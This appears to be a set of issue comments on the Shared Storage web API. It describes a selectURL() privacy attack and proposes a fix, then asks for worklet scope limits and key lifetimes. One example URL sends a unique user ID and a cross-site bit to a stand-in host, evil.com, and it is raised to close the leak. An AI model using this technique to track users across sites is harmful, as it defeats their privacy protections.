Let selectURL([url1, url2, url3]); pick url2 if some third party bit = 0 and url3 if the third party bit is 1. Let url3 be above the k-anonymity threshold, but not url1 or url2.

If the third party bit is 0 (or repeat with a different selection algorithm for 1), url1 will be loaded even though it isn't k-anonymous and joins a bit of cross-site data (e.g. the URL could be "https://evil.com?first_party_id=unique_id&third_party_bit=0"). You can repeat this process to extract arbitrarily many bits of cross-site data to the server (if the server is untrusted; otherwise you just get a single k-anonymity violation + 1-bit leak locally).

We want to ensure the following property:

The selected URL is independent of third-party information OR The selected URL is k-anonymous.

We can achieve this with an additional check at the start, as follows:

If the first URL (the default URL) is not k-anonymous, select it (or even return an error) and increment its k-anonymity.
If the first URL is k-anonymous, proceed with the above design.

Tanayout

Good

Spec: make sharedStorage functions not available in the top-level worklet script environment

This is currently implemented but not in the spec, but top-level accesses to sharedStorage should fail in worklet global scopes, e.g.:

class Operation {
  async run(data) {
    // ok to access sharedStorage here
  }
}
register("operation", Operation)

sharedStorage.get(...)  // This should fail

Key Lifetime

No mention is made of how long keys are persisted. The set() and append() calls should include an optional parameter that allows the lifetime to be specified. This should default to something like 30 days. If set() is called on an existing key with ignoreIfPresent true, its lifetime should still be updated. You could either always update it to the newly specified expiration or to the latest of its current expiration and its newly specified expiration.